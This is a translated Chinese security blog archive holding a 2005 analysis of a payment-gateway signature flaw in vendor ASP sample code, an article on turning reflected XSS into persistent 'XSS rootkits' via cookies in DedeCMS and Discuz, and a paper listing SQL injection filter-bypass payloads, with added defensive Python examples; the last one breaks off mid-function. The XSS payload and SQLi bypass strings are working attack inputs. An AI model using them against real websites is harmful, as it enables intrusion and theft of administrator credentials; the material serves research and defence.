Category archive: Information Security

A First Look at the Yunwang (云网) Online Payment Vulnerability [2005]

To understand this vulnerability you first need to understand the online payment flow; here is the flow diagram from Yunwang's official documentation:

A normal online payment runs from step 1 through step 6.
The vulnerability sits at step 2: it skips steps 3, 4 and 5 and submits the return information directly to the "payment successful" return page.
In the demo video, too, all we saw was a submission page and the site's own "payment successful" page. No payment operation ever went through the gateway, so no money reached the bank; there is no question of the bank's security being affected here, it is purely a deception.
Why does this happen? The problem lies in the payment interface files Yunwang supplies to merchants. Let's look at the two interface files Yunwang provides to merchants:
<%
'*******************************************
'File name: SendOrder.asp
'Main function: this sample program submits the merchant's order information to the Yunwang payment gateway
'Version: v1.6 (Build2005-05-24)
'Description: assuming the merchant's order system is already complete, this page helps the merchant submit the order information, in the format required by the Yunwang payment gateway, to the Yunwang Payment@Net (云网支付@网) payment interface to carry out the payment
'Copyright: Beijing Yunwang Wuxian Network Technology Co., Ltd. (北京云网无限网络技术有限公司)
'*******************************************

'--- Order information ---
  Dim c_mid          'Merchant ID, obtained when the merchant account is approved; it is given in the approval e-mail
  Dim c_order        'Order number generated by the merchant site; must be unique
  Dim c_name         'Recipient name on the merchant order
  Dim c_address      'Recipient address on the merchant order
  Dim c_tel          'Recipient telephone on the merchant order
  Dim c_post         'Recipient postcode on the merchant order
  Dim c_email        'Recipient e-mail on the merchant order
  Dim c_orderamount  'Total amount of the merchant order
  Dim c_ymd          'Date the merchant order was created, format "yyyymmdd", e.g. 20050102
  Dim c_moneytype    'Payment currency, 0 = RMB
  Dim c_retflag      'Whether to return to a merchant-specified file after successful payment, 0: no return 1: return required
  Dim c_paygate      'Set this if the bank is chosen on the merchant site; see Appendix 1 of the "Yunwang Payment@Net Technical Interface Manual" for the values; leave empty if the bank is chosen on Yunwang Payment@Net
  Dim c_returl       'If c_retflag is 1, the path of the file to return to after successful payment
  Dim c_memo1        'Merchant parameter one, to be forwarded in the payment result notification
  Dim c_memo2        'Merchant parameter two, to be forwarded in the payment result notification
  Dim c_signstr      'MD5 signature string the merchant computes over the order information
  Dim c_pass         'Payment key; log in to the merchant back end and find it under Account Information -> Basic Information -> Security Information, "payment key"
  Dim notifytype     '0 normal notification / 1 server notification; empty means normal notification
  Dim c_language     'When international card payment is enabled, sets the language of the bank payment page: 0 bank page in Chinese / 1 bank page in English

  c_mid          = "000103"
  c_order        = "12345"
  c_name         = "张三"
  c_address      = "北京市朝阳区XX"
  c_tel          = "010-12345678"
  c_post         = "100001"
  c_email        = "zhangsan@test.com"
  c_orderamount  = "0.01"
  c_ymd          = "20050102"
  c_moneytype    = "0"
  c_retflag      = "1"
  c_paygate      = ""
  c_returl       = "http://www.xxx.com/xxx/xxx.asp"  'The page on which the merchant receives the Yunwang payment result notification; give the full file name
  c_memo1        = "ABCDE"
  c_memo2        = "12345"
  c_pass         = "Test"
  notifytype     = "0"
  c_language     = "0"

  srcStr = c_mid & c_order & c_orderamount & c_ymd & c_moneytype & c_retflag & _
           c_returl & c_paygate & c_memo1 & c_memo2 & notifytype & c_language & c_pass
  'Note: if you want to specify the payment method (c_paygate), the user must first choose the payment method and the MD5 is then computed here from that choice; in other words this page should then be split into two pages, completed in two steps.

'--- MD5 the order information
  c_signstr  = MD5(srcStr)

%>
<table width="85%" border="0" align="center" cellpadding="0" cellspacing="0">
 <tr>
 <td align="center">
 <form name="payForm1" action="https://www.cncard.net/purchase/getorder.asp" method="POST">
      <input type="hidden" name="c_mid" value="<%=c_mid%>">
      <input type="hidden" name="c_order" value="<%=c_order%>">
      <input type="hidden" name="c_name" value="<%=c_name%>">
      <input type="hidden" name="c_address" value="<%=c_address%>">
      <input type="hidden" name="c_tel" value="<%=c_tel%>">
      <input type="hidden" name="c_post" value="<%=c_post%>">
      <input type="hidden" name="c_email" value="<%=c_email%>">
      <input type="hidden" name="c_orderamount" value="<%=c_orderamount%>">
      <input type="hidden" name="c_ymd" value="<%=c_ymd%>">
      <input type="hidden" name="c_moneytype" value="<%=c_moneytype%>">
      <input type="hidden" name="c_retflag" value="<%=c_retflag%>">
      <input type="hidden" name="c_paygate" value="<%=c_paygate%>">
      <input type="hidden" name="c_returl" value="<%=c_returl%>">
      <input type="hidden" name="c_memo1" value="<%=c_memo1%>">
      <input type="hidden" name="c_memo2" value="<%=c_memo2%>">
      <input type="hidden" name="c_language" value="<%=c_language%>">
      <input type="hidden" name="notifytype" value="<%=notifytype%>">
      <input type="hidden" name="c_signstr" value="<%=c_signstr%>">
      <input type="submit" name="submit" value="点击 -> 云网支付@网">
 </form>
  </td>
 </tr>
</table>

These are the key parts of the page that submits the order information to the Yunwang gateway. Note the variable c_signstr
and how it is generated: several order fields are concatenated and then MD5-hashed to produce the verification signature. This signature is the crux.
But as the form below shows, everything is submitted in plaintext. Of course it has to be plaintext; if it were encrypted, things would break later on.

Next let's look at the code of the page that receives the bank's success notification once the order has succeeded:
<%
'*******************************************
'File name: GetPayNotIFy.asp
'Main function: this sample program receives the payment notification from the Yunwang payment gateway, verifies its validity and determines the payment result
'Version: v1.6 (Build2005-05-24)
'Notes:
'  1. Do not use page redirection statements such as response.redirect on this page
'  2. Output the order processing result directly on this page as HTML; the Yunwang payment gateway uses technical means to read your output
'  3. If this page contains images, styles or links, give the path or address including the domain name, e.g. <img src="/pic/15/a2005-12-21-580a.gif">
'Copyright: Beijing Yunwang Wuxian Network Technology Co., Ltd. (北京云网无限网络技术有限公司)
'*******************************************

'--- Get the payment notification sent by the Yunwang payment gateway to the merchant (hereafter "the notification")
c_mid          = request("c_mid")          'Merchant ID, obtained when the merchant account is approved; it is given in the approval e-mail
c_order        = request("c_order")        'Order number supplied by the merchant
c_orderamount  = request("c_orderamount")  'Order total supplied by the merchant, in yuan with two decimal places, e.g. 13.05
c_ymd          = request("c_ymd")          'Order creation date passed by the merchant, format "yyyymmdd", e.g. 20050102
c_transnum     = request("c_transnum")     'Transaction serial number assigned to this order by the Yunwang payment gateway, for later queries and reconciliation
c_succmark     = request("c_succmark")     'Transaction success flag, Y = success N = failure
c_moneytype    = request("c_moneytype")    'Payment currency, 0 = RMB
c_cause        = request("c_cause")        'If the payment failed, the reason for failure
c_memo1        = request("c_memo1")        'Merchant parameter one, forwarded in the payment result notification
c_memo2        = request("c_memo2")        'Merchant parameter two, forwarded in the payment result notification
c_signstr      = request("c_signstr")      'MD5 string computed by the Yunwang payment gateway over the information above

'--- Check that the notification is complete ---
IF c_mid="" or c_order="" or c_orderamount="" or c_ymd="" or c_moneytype="" or _
   c_transnum="" or c_succmark="" or c_signstr="" THEN
  response.write "支付信息有误"
  response.end
END IF

  '--- Concatenate the notification fields into the source string for MD5; note that the order must not be changed
    Dim c_pass  'The merchant's payment key; log in to the merchant back end (https://www.cncard.net/admin/), it is shown on the management home page
    c_pass = "Test"

    srcStr = c_mid & c_order & c_orderamount & c_ymd & c_transnum & c_succmark _
             & c_moneytype & c_memo1 & c_memo2 & c_pass

  '--- MD5 the payment notification
    r_signstr  = MD5(srcStr)

  '--- Check that the merchant site's MD5 of the notification matches the MD5 supplied by the Yunwang payment gateway
    IF r_signstr<>c_signstr THEN
      response.write "签名验证失败"
      response.end
    END IF

  '--- Check the merchant ID
    Dim MerchantID  'The merchant's own ID
    IF MerchantID<>c_mid THEN
      response.write "提交的商户编号有误"
      response.end
    END IF

  '--- Check that the order in the notification exists in the merchant's order system
    Dim conn  'The merchant system's database connection
    sql="select top 1 数据列 from 商户的订单表 where 商户订单号="& c_order
    set rs=server.CreateObject("adodb.recordset")
    rs.open sql,conn
    IF rs.eof THEN
      response.write "未找到该订单信息"
      response.end
    END IF

  '--- Check that the order amount recorded in the merchant's order system matches the amount in the gateway notification
    Dim r_orderamount  'Order amount recorded in the merchant's own system
    r_orderamount=rs("订单金额")  'The merchant reads this from its own order system
    IF ccur(r_orderamount)<>ccur(c_orderamount) THEN
      response.write "支付金额有误"
      response.end
    END IF

  '--- Check that the order creation date recorded in the merchant's order system matches the date in the gateway notification
    Dim r_ymd  'Order creation date recorded in the merchant's own system
    r_ymd=rs("订单生成日期")  'The merchant reads this from its own order system
    IF r_ymd<>c_ymd THEN
      response.write "订单时间有误"
      response.end
    END IF

  '--- Check that the forwarded parameters recorded in the merchant's system match those in the gateway notification
    Dim r_memo1  'Forwarded parameter one recorded in the merchant's own system
    r_memo1 = rs("转发参数一")
    Dim r_memo2  'Forwarded parameter two recorded in the merchant's own system
    r_memo2 = rs("转发参数二")
    IF r_memo1<>c_memo1 or r_memo2<>c_memo2 THEN
      response.write "参数提交有误"
      response.end
    END IF

  '--- Check that the returned payment result has a valid format
    IF c_succmark<>"Y" and c_succmark<>"N" THEN
      response.write "参数提交有误"
      response.end
    END IF

  '--- Act on the payment result: the merchant ships the goods and so on
    IF c_succmark="Y" THEN
      'Ship the goods and so on according to the merchant's own business rules
    END IF
%>

We can see that the signature is verified by concatenating the information fed back by the bank with the information submitted on the submission page.
Let's first look at how the signature is verified:
  '--- Concatenate the notification fields into the source string for MD5; note that the order must not be changed
    Dim c_pass  'The merchant's payment key; log in to the merchant back end (https://www.cncard.net/admin/), it is shown on the management home page
    c_pass = "Test"

    srcStr = c_mid & c_order & c_orderamount & c_ymd & c_transnum _
             & c_succmark & c_moneytype & c_memo1 & c_memo2 & c_pass

  '--- MD5 the payment notification
    r_signstr  = MD5(srcStr)

  '--- Check that the merchant site's MD5 of the notification matches the MD5 supplied by the Yunwang payment gateway
    IF r_signstr<>c_signstr THEN
      response.write "签名验证失败"
      response.end
    END IF
It is verified by hashing these submitted fields, and the merchant's payment key, which the program has to add in here, is something we can obtain from the submission page. We do not even need it: all we need is to make r_signstr equal c_signstr and it is done. I will not describe the spoofing method.
As for the other spoofable fields, no hashing is involved at all; everything is plaintext, so they are trivially passed.
PS: the same author also posted another video of an online payment vulnerability at the time, which I deleted without even watching. Do you believe this video? I certainly don't.
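As an added example (not code from the original post or from Yunwang), the following Python models the merchant-side checks GetPayNotify.asp performs, in the same signed-field order, and adds the two controls a defender wants on top of them: a constant-time signature comparison and a one-shot state check so that a genuine notification cannot be replayed to mark an order paid twice. The payment key "Test", merchant ID "000103" and order "12345" are the sample values from the page; the order store and the transaction number are constructed.

```python
import hashlib
import hmac
from decimal import Decimal, InvalidOperation

MERCHANT_ID = "000103"   # sample merchant ID from the page's SendOrder.asp

# Field order of the notification signature, exactly as in GetPayNotify.asp:
# MD5(c_mid & c_order & c_orderamount & c_ymd & c_transnum & c_succmark
#     & c_moneytype & c_memo1 & c_memo2 & c_pass)
SIGNED_FIELDS = ("c_mid", "c_order", "c_orderamount", "c_ymd", "c_transnum",
                 "c_succmark", "c_moneytype", "c_memo1", "c_memo2")
REQUIRED_FIELDS = ("c_mid", "c_order", "c_orderamount", "c_ymd", "c_moneytype",
                   "c_transnum", "c_succmark", "c_signstr")


def notify_signature(params, secret):
    """Recompute the gateway signature. The ASP sample's MD5() is assumed to
    return lowercase hex, which is what hexdigest() produces."""
    src = "".join(params.get(f, "") for f in SIGNED_FIELDS) + secret
    return hashlib.md5(src.encode("utf-8")).hexdigest()


def fresh_orders():
    """Constructed stand-in for the merchant order table: one unpaid order."""
    return {"12345": {"amount": "0.01", "ymd": "20050102",
                      "memo1": "ABCDE", "memo2": "12345", "paid": False}}


def verify_notification(params, secret, orders):
    """Return (accepted, reason). Mirrors the sample's checks in order, then
    adds replay protection: an order is marked paid at most once."""
    if any(not params.get(f) for f in REQUIRED_FIELDS):
        return False, "incomplete payment information"
    expected = notify_signature(params, secret)
    # compare_digest does not leak the expected value through timing
    if not hmac.compare_digest(expected, params["c_signstr"].lower()):
        return False, "signature verification failed"
    if params["c_mid"] != MERCHANT_ID:
        return False, "wrong merchant ID"
    order = orders.get(params["c_order"])
    if order is None:
        return False, "order not found"
    try:
        amount_ok = Decimal(order["amount"]) == Decimal(params["c_orderamount"])
    except InvalidOperation:
        amount_ok = False
    if not amount_ok:
        return False, "payment amount mismatch"
    if order["ymd"] != params["c_ymd"]:
        return False, "order date mismatch"
    if (order["memo1"], order["memo2"]) != (params.get("c_memo1", ""), params.get("c_memo2", "")):
        return False, "forwarded parameters mismatch"
    if params["c_succmark"] not in ("Y", "N"):
        return False, "malformed success flag"
    if order["paid"]:
        return False, "order already processed"   # added check, not in the sample
    if params["c_succmark"] == "Y":
        order["paid"] = True                       # the merchant ships goods here
        return True, "paid"
    return True, "payment reported as failed: " + params.get("c_cause", "")
```

Everything in this notification rests on c_pass: anyone who knows it can produce a valid c_signstr for any order and any amount, which is exactly what the article exploits, so the key has to be a random per-merchant value, never the sample "Test", and must never reach the browser. Marking the order paid only once additionally stops a captured genuine notification from being replayed.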

The IBatis.Net framework and SQL injection

Mainly caused by the different way the $ and # symbols are parsed in the sqlmap configuration files:

Preventing SQL injection in iBatis fuzzy (LIKE) queries

http://developer.51cto.com/art/200907/139144.htm

Solving SQL injection in iBatis

http://www.cnblogs.com/aaa6818162/archive/2011/05/21/2052759.html

SQL injection in iBatis, confirming what I had suspected
http://blog.csdn.net/oswin_jiang/article/details/4242431

On iBatis's automatic prevention of SQL injection

http://blog.csdn.net/yangqillohe/article/details/4139265


Digging into an XSS Vulnerability Scenario: XSS Rootkit [Complete Revised Edition]

EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2011-10-15
 
0x00 Preface
 
As everyone knows, the risk rating of XSS vulnerabilities has always been somewhat vague, and whether XSS counts as a high-risk or a low-risk vulnerability has long been debated. XSS vulnerabilities fall mainly into two types, persistent and non-persistent:
 
1. Non-persistent XSS generally lives in URL parameters; the victim has to visit a specific URL crafted by the attacker for it to fire.
 
2. Persistent XSS generally lives in interactive features such as rich text, for example posts and comments; the attacker feeds XSS content into the database through normal functionality, where it is stored persistently.

3. DOM XSS, which also comes in persistent and non-persistent forms, mostly arises when JavaScript DOM interfaces read the address bar or the referer, or write the content of a specified HTML tag without encoding.
 
Persistent XSS is generally rated higher risk than non-persistent XSS, and in terms of the nature of the vulnerability that is correct, but exploitation still depends on the scenario, and sometimes looking more deeply at the scenario turns up something unexpected. Read on.

 
0x01 Analysing the vulnerability scenario
 
First, a simple piece of PHP pagination code with an XSS vulnerability:
 
demo.php -------------------------------------------------------------
<?php
// Simulated register_globals: copy every GET, POST and COOKIE key into a global variable
foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
    foreach ($$_request as $_k => $_v) ${$_k} = $_v;
}
?>

<a href="<?php echo $_SERVER["PHP_SELF"]; ?>?id=<?php echo $id; ?>">分页</a>
---------------------------------------------------------------------
 
Simulating register_globals like this is common in web applications, and printing the page's pagination link is common too; because the incoming data is not validated, this produces the most common kind of XSS vulnerability.
 
Here is how to verify this XSS vulnerability:
 http://127.0.0.1/demo.php?id=1"><script>alert(1)</script>
 
The GET request passes HTML in the id parameter, which closes the href attribute in the page content and executes the script inside the script tag:
 
<a href="/demo.php?id=1"><script>alert(1)</script>">分页</a>
 
This is a typical non-persistent XSS vulnerability. In conventional thinking the vulnerability basically stops here, and this article would be about to turn into an ordinary primer, but things are not that simple: dig a little deeper into this vulnerability scenario and you reach the main act of this article.

0x02 How an XSS Rootkit is built
 
We know that operating systems have kernel backdoors called rootkits. One of a rootkit's main characteristics is stealth: ordinary security software cannot detect that a rootkit is running, which lets the backdoor survive on the system for a long time. Web application vulnerabilities rarely achieve this effect, but I found that XSS vulnerabilities in certain scenarios can.

Popular PHP web applications today like to simulate the register_globals feature themselves, registering variables from GET, POST, cookie and so on (abbreviated GPC in the rest of this article). Registering variables directly from GPC is convenient for the whole program, and that is exactly what this article revolves around.

The XSS vulnerability I simulated in the first part is a typical global-variable-registration scenario: demo.php accepts parameters not only via GET but also via cookie, and the registration order is GPC. Because the registration is a foreach loop, variables registered from G and P are finally overwritten by C. Cookies are persistent data in the client browser, so if we set a cookie through the XSS vulnerability we can turn this typical non-persistent XSS into a persistent one. That should sound exciting; let's test it:
 
First, a piece of JavaScript that sets the cookie:
 
Persistence_data='"><script>alert(/xss/)</script>';
var date=new Date();
var expireDays=365; // the cookie expires one year from now
date.setTime(date.getTime()+expireDays*24*3600*1000);
document.cookie='id='+Persistence_data+';expires='+date.toGMTString(); // set the cookie's id parameter to the XSS code
 
Encode the cookie-setting JavaScript once and place it in the XSS URL, so that magic quotes and unknown encoding behaviour in different browsers do not interfere with the test. With the XSS filters of IE8/9 and the like turned off, visit the following URL to make the XSS take effect.
 
http://127.0.0.1/demo.php?id=1"><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,47,41,60,47,115,99,114,105,112,116,62,39,59,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,105,100,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59))</script>

 
The result is very satisfying: after closing the browser, or even shutting down and restarting the computer, when we revisit the following pages:

whether we visit http://127.0.0.1/demo.php

or http://127.0.0.1/demo.php?id=1

our XSS code fires either way, and unless the client clears its cookies this XSS vulnerability stays effective for a year, achieving the rootkit properties of stealth and long-term persistence.

0x03 XSS Rootkit in practice

The gotopage variable in the template of the DedeCMS back-end login page has an XSS vulnerability; the code is:

dede\templets\login.htm

around line 65

<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />

In the DedeCMS core code, the simulated global-variable-registration order is GPC, i.e. C can overwrite variables registered from G and P.

Applying the code from 0x02 again, the gotopage variable can be stored persistently in the cookie. If an administrator has ever triggered our XSS, we can persist a gotopage variable in the administrator's cookie and turn the hidden gotopage form value into arbitrary script of ours; from then on the XSS fires whenever the administrator visits a back-end page, so we can hijack the administrator's entire login process and silently obtain the administrator's password.

Of course, how flexibly this DedeCMS vulnerability is used depends on the attacker's imagination. For example, since IE8/9 block URL-based XSS, a persistent XSS or DOM XSS can serve as the payload for this kind of XSS rootkit. Also, setting cookies is not restricted by the same-origin policy: a cookie set on any subdomain can be accepted by every application on the whole domain, so an attacker can step outside the limits of the DedeCMS program itself and attack the DedeCMS back end from the weakest point of the whole site architecture.

0x04 Further XSS Rootkit scenarios

In the PHP global-variable-registration scenario, changing the GPC registration order weakens the XSS rootkit effect, as in the Discuz program:

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
 foreach($$_request as $_key => $_value) {
  $_key{0} != '_' && $$_key = daddslashes($_value);
 }
}

The registration order is CPG, so our C can never overwrite a variable registered from G or P. Still, if some code path leaves a variable uninitialised, the XSS rootkit effect is possible, as in

http://xx.163.com/logging.php?action=logout&referer=javascript:alert()&formhash=rootkit

The logout code in Discuz has an XSS vulnerability: when the user is not logged in, the referer variable in the logout code is not initialised, so we can control it arbitrarily.

In this case we need not worry about the CPG registration order, but we have to construct a specific URL that causes the variable to be uninitialised before the XSS triggers, which greatly weakens the XSS rootkit effect: a logged-in user's normal logout cannot trigger our XSS, so the advantage of an XSS rootkit is lost.
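The two registration orders discussed in 0x02 (demo.php, GPC) and here in 0x04 (Discuz, CPG), and the uninitialised-variable case, can be modelled in a few lines. The Python below is an added example, not code from the article, DedeCMS or Discuz: it reproduces the PHP foreach-over-GPC loop as a dictionary merge, renders the demo.php link the vulnerable way, and then shows the hardened rendering a defender would use, which never treats a cookie as a request parameter and HTML-encodes the output. The parameter dictionaries are constructed.

```python
import html

DEMO_ORDER = ("_GET", "_POST", "_COOKIE")     # demo.php: cookie registered last, so it wins
DISCUZ_ORDER = ("_COOKIE", "_POST", "_GET")   # Discuz: GET registered last, so it wins


def register_globals(sources, order):
    """Model of the PHP foreach-over-GPC loop: every key of each source is
    copied into one namespace, and a later source overwrites an earlier one.
    Names beginning with '_' are skipped, as the Discuz loop does."""
    registered = {}
    for name in order:
        for key, value in sources.get(name, {}).items():
            if key.startswith("_"):
                continue
            registered[key] = value
    return registered


def render_page_link(script, registered):
    """Vulnerable rendering as in demo.php: $id is interpolated raw into the attribute,
    so whatever source won the registration ends up in the HTML unescaped."""
    return '<a href="%s?id=%s">分页</a>' % (script, registered.get("id", ""))


def render_page_link_safe(script, get_params):
    """Hardened rendering: read the page id from GET only (cookies are not a
    source of request parameters), require an integer, and HTML-encode."""
    page_id = get_params.get("id", "1")
    if not page_id.isdigit():        # allowlist: a page id is a non-negative integer
        page_id = "1"
    return '<a href="%s?id=%s">分页</a>' % (html.escape(script, quote=True),
                                            html.escape(page_id, quote=True))
```

With demo.php's order the cookie value replaces the id from the query string on every request, which is the persistence the article describes; with the Discuz order it cannot, unless the request carries no id at all, in which case the cookie value is the only one registered and the variable is effectively "uninitialised" from the application's point of view. The hardened renderer is unaffected by either order because it does not consult the merged namespace.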

Another scenario is the misuse of request-type variables. They behave differently in different scripting languages and server environments; as mentioned in my earlier "A brief discussion of several ways to bypass a WAF", request-type variables in ASP/ASP.NET have a multi-parameter property, so the contents of G, P and C can all enter the registered variable at once, which may also produce an XSS rootkit vulnerability.

Finally there is a special DOM XSS case that 80sec member Fenggou (疯狗) found some years ago: the home page of a large website read the user ID from the cookie and displayed it in the page without HTML encoding, so a single XSS vulnerability was enough to install an XSS rootkit on the home page.

There are of course many more scenarios; Jianxin's (剑心) "Rootkits in web applications" covers some of them. That is as far as I will go on XSS rootkit scenarios; the rest is left to your imagination.

 
0x05 Afterword

We have now turned a non-persistent XSS vulnerability into an XSS rootkit, which once again shows how important the scenario of a vulnerability is, and how satisfying it is to dig into a scenario and transform a vulnerability's nature.

Developers need to pay attention to every detail of application security; any inconspicuous vulnerability can cause unexpected harm.
 
Some web vulnerability scanner reports flag non-persistent XSS as high risk, which is widely disputed. This article can serve as a reference for defining the risk by digging deeper into the scenario; if it does, its most important purpose has been achieved.

0x06 References

Browser hijacking attacks caused by cross-site scripting vulnerabilities
http://www.80sec.com/browser-hijacking.html

Rootkits in web applications
http://www.80sec.com/webapp-rootki.html

A brief discussion of several ways to bypass a WAF
http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html
 

Methods of bypassing WAF filtering: a new challenge for injection prevention

Beyond SQLi: Obfuscate and Bypass

from:http://www.friddy.cn/article.asp?id=128

|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[  By CWH Underground  ]=--------------------=|
|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: Beyond SQLi: Obfuscate and Bypass
Author	: "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date	: 2011-10-06


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Filter Evasion (Mysql)

		[0x01a] - Bypass Functions and Keywords Filtering
		[0x01b] - Bypass Regular Expression Filtering
		
  [0x02] - Normally Bypassing Techniques

  [0x03] - Advanced Bypassing Techniques

		[0x03a] - HTTP Parameter Pollution: Split and Join
		[0x03b] - HTTP Parameter Contamination
  		
  [0x04] - How to protect your website

  [0x05] - Conclusion

  [0x06] - References

  [0x07] - Greetz To


#######################
 [0x00] - Introduction
#######################

	Welcome readers, this paper is a long attempt at documenting the advanced SQL injection techniques we have been working on.
It discloses advanced bypassing and obfuscation techniques, many of which can be used against real CMSs and WAFs. The SQL injection statements proposed in this paper are just some of the ways to bypass protection.
There are other techniques that can be used to attack web applications, but unfortunately we cannot disclose them right now, as they are kept as 0-day attacks. However, this paper aims to show that there is no completely secure system
in the real world, even if you spend more than 300,000 USD on a WAF.

	This paper is divided into 7 sections, but only sections 0x01 to 0x03 contain technical information.

	In section 0x01 we give details of how to bypass filters, including basic, function and keyword filters.
In section 0x02 we present common techniques for bypassing open-source and commercial WAFs.
In section 0x03 we discuss advanced bypassing techniques in depth, split into two parts, "HTTP Parameter Contamination"
and "HTTP Parameter Pollution: Split and Join". In section 0x04 we give guidance on the right way to protect your own website.
Finally, section 0x05 draws conclusions from sections 0x01-0x04.


#################################
 [0x01] - Filter Evasion (Mysql)
#################################
	
	This section describes filter evasion for PHP and MySQL and how to bypass the filtering. Filtering is a technique used to prevent SQL injection attacks, implemented either with a black list of SQL functions and keywords or with regular expressions.
This means that its effectiveness relies heavily on how the black list or regular expression is built: if it does not cover every injection scenario, the web application is still vulnerable to SQL injection attacks.

	+++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01a] - Bypass Functions and Keywords Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++++++
	
		Function and keyword filtering prevents web applications from being attacked by using a black list of functions and keywords. If an attacker submits injection code containing a keyword or SQL function in the black list, the injection fails.
	However, if the attacker is able to rewrite the injection using another keyword or function, the black list fails to prevent the attack. To prevent attacks, a large number of keywords and functions have to be put into the black list. However, this affects users
	who want to submit input containing a word in the black list: they are unable to submit it because the black list filters it. The following scenarios show cases of function and keyword filtering and bypass techniques.

		
		Keyword filter: 	and, or
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or)/i', $id)

		The keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

		Filtered injection:	1 or 1 = 1		1 and 1 = 1
		Bypassed injection:	1 || 1 = 1		1 && 1 = 1
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union)/i', $id)

		The keyword union is generally used to build a malicious statement that selects extra data from the database.

		Filtered injection:	union select user, password from users
		Bypassed injection:	1 || (select user from users where user_id = 1) = 'admin'

		** Remark: you have to know the table name, column name and some data in the table; otherwise you have to get them from the information_schema.columns table using another statement,
		e.g. using the substring function to get each character of the table names.
		----------------------------------------------------------------------

		
		Keyword filter: 	and, or, union, where
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where)/i', $id)
		Filtered injection:	1 || (select user from users where user_id = 1) = 'admin'
		Bypassed injection:	1 || (select user from users limit 1) = 'admin'
		----------------------------------------------------------------------

		
		Keyword filter: 	and, or, union, where, limit
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit)/i', $id)
		Filtered injection:	1 || (select user from users limit 1) = 'admin'
		Bypassed injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union, where, limit, group by
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by)/i', $id)
		Filtered injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		Bypassed injection:	1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
		----------------------------------------------------------------------

		
		Keyword filter: 	and, or, union, where, limit, group by, select
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
		Filtered injection:	1 || (select substr(group_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || 1 = 1 into outfile 'result.txt'
		Bypassed injection:	1 || substr(user,1,1) = 'a'
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union, where, limit, group by, select, '
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
		Filtered injection:	1 || (select substr(group_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || user_id is not null
		Bypassed injection:	1 || substr(user,1,1) = 0x61
		Bypassed injection:	1 || substr(user,1,1) = unhex(61)
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union, where, limit, group by, select, ', hex
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = unhex(61)
		Bypassed injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union, where, limit, group by, select, ', hex, substr
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		Bypassed injection:	1 || lpad(user,7,1)
		----------------------------------------------------------------------


		Keyword filter: 	and, or, union, where, limit, group by, select, ', hex, substr, white space
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
		Filtered injection:	1 || lpad(user,7,1)
		Bypassed injection:	1%0b||%0blpad(user,7,1)
		----------------------------------------------------------------------


		From the above examples it can be seen that a number of SQL statements bypass the black list even though it contains many keywords and functions.
	Furthermore, there are many more SQL statements, not shown in these examples, that can be used to bypass the black list.

		Creating a bigger black list is not a good way to protect your own websites. Remember: the more keywords and functions you filter, the less user friendly the application becomes.
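The trade-off this section describes, a keyword black list that still lets the page's first bypass through while rejecting ordinary users, is easy to see side by side with the control that does not have that trade-off. The Python below is an added example, not code from the paper: it applies one of the page's preg_match black lists as a Python regex, then looks up the same input with a parameterised query and an integer allowlist, where the input can only ever be a value. The in-memory SQLite table and its rows are constructed (the paper's examples target MySQL; the parameterisation point is the same).

```python
import re
import sqlite3

# One of the page's keyword black lists, as a PHP preg_match would apply it
KEYWORD_BLACKLIST = re.compile(r"(and|or|union|where|limit|group by|select)", re.I)


def blacklist_rejects(value):
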